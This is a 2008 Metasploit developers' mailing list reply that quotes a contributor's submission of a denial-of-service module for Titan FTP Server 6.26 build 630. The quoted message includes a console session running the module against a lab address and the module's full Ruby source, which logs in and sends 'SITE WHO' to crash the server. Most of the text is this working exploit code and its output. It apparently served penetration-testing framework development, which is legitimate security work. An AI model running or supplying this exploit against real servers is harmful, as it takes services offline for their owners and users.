Added. Thanks!

Best regards,


On Tue, 2008-10-14 at 19:38 -0500, Kris Katterjohn wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Hey guys,
> 
> I've attached a DoS auxiliary module for the Titan FTP server v6.26 build 630,
> based on the Python script from earlier today.
> 
> 
> msf > use dos/ftp/titan626_site
> msf auxiliary(titan626_site) > set RHOST 192.168.10.2
> RHOST => 192.168.10.2
> msf auxiliary(titan626_site) > set FTPUSER test
> FTPUSER => test
> msf auxiliary(titan626_site) > set FTPPASS test
> FTPPASS => test
> msf auxiliary(titan626_site) > run
> [*] Connecting to FTP server 192.168.10.2:21...
> [*] Connected to target FTP server.
> [*] Authenticating as test with password test...
> [*] Sending password...
> [*] Sending command...
> [*] Auxiliary module execution completed
> 
> 
> msf auxiliary(titan626_site) > info
> 
>        Name: Titan FTP Server 6.26.630 SITE WHO DoS
>     Version: 1
> 
> Provided by:
>   Kris Katterjohn <[EMAIL PROTECTED]>
> 
> Basic options:
>   Name     Current Setting  Required  Description
>   ----     ---------------  --------  -----------
>   FTPPASS  test             yes       Valid FTP password for username
>   FTPUSER  test             yes       Valid FTP username
>   RHOST    192.168.10.2     yes       The target address
>   RPORT    21               yes       The target port
> 
> Description:
>   The Titan FTP server v6.26 build 630 can be DoS'd by issuing "SITE
>   WHO". You need a valid login so you can send this command.
> 
> 
> Thanks,
> Kris Katterjohn
> 
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
> Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
> 
> iQIVAwUBSPU7kv9K37xXYl36AQL/DA//YHo5MLoeVi2YWZ5OtEiCZeT1oFJoUkvW
> FEAtf3kXMU8sg3ndelJTDR670TkDy/hfYE5ZqNyEjb6sLslAOCso1og3g7z5dCsQ
> x5ApNjTjmNiiQyY4uErpa/a1sORUGiIXrfn4Cyf3fZT4aA+G8ATUo6Y1ypi3IrAY
> QkEK+9aQuAmhzbVhsFPnmIduHuCAHakpEjx4az9U+3j2+LUkBV94kn6tnLlMazjQ
> 2zVBrar9WrPQlpNzkaH7KMUpMft057+2H/UxWROjzXDGISfCkhqXwweyKeOk7lTT
> gW+fDLxu2rbyR2X2G0nnEOSaWomeCrm2OZoQx+R/lciiB68vsFBBcf9kIQbs1r89
> 75nW9uxbtEGPSHYEXeabqL8KgCC+ckxUOzJL6sbnf3BasGvyPYdNi/yARGImIhUL
> pbEyUO3YQRtwI3KcohpGHXNdf+9p72iOKRqH3vdLKNjlde0mLMh6QsJs1fieIaPE
> hYgE9qs221I18TTmZljmLh6RyFoaM98eTHMCAUGJZlogr9d2ypv5/HQZnVN+2vlp
> vCbpz7gfd61Db+cBTPWhBvGT28JArGr2ktsoJZiPmj6+ehWkZR2UjnGwSghwu6A6
> xCpP0xjTxFKqLgqCUWu0Fer2s2P3yq+FV5OXHzawYFSCf7rJLM8qIcPJP1NksAXf
> ReymTAm6UCc=
> =0ama
> -----END PGP SIGNATURE-----
> plain text document attachment (titan626_site.rb)
> require 'msf/core'
> 
> class Metasploit3 < Msf::Auxiliary
> 
>       include Msf::Exploit::Remote::Ftp
> 
>       def initialize(info = {})
>               super(update_info(info, 
>                       'Name'           => 'Titan FTP Server 6.26.630 SITE WHO 
> DoS',
>                       'Description'    => %q{
>                               The Titan FTP server v6.26 build 630 can be 
> DoS'd by
>                               issuing "SITE WHO".  You need a valid login so 
> you
>                               can send this command.
>                       },
>                       'Author'         => 'Kris Katterjohn <[EMAIL 
> PROTECTED]>',
>                       'License'        => MSF_LICENSE,
>                       'Version'        => '1',
>                       'References'     =>
>                               [ [ 'URL', 'http://milw0rm.com/exploits/6753'] 
> ],
>                       'DisclosureDate' => 'Oct 14 2008'))
> 
>               # They're required
>               register_options([
>                       OptString.new('FTPUSER', [ true, 'Valid FTP username', 
> 'anonymous' ]),
>                       OptString.new('FTPPASS', [ true, 'Valid FTP password 
> for username', 'anonymous' ])
>               ])
>       end
> 
>       def run
>               connect_login
>               print_status("Sending command...")
>               raw_send("SITE WHO\r\n")
>               sleep 1
>               disconnect
>       end
> end
> 
> _______________________________________________
> Framework-Hackers mailing list
> Framework-Hackers@spool.metasploit.com
> http://spool.metasploit.com/mailman/listinfo/framework-hackers

_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers

Reply via email to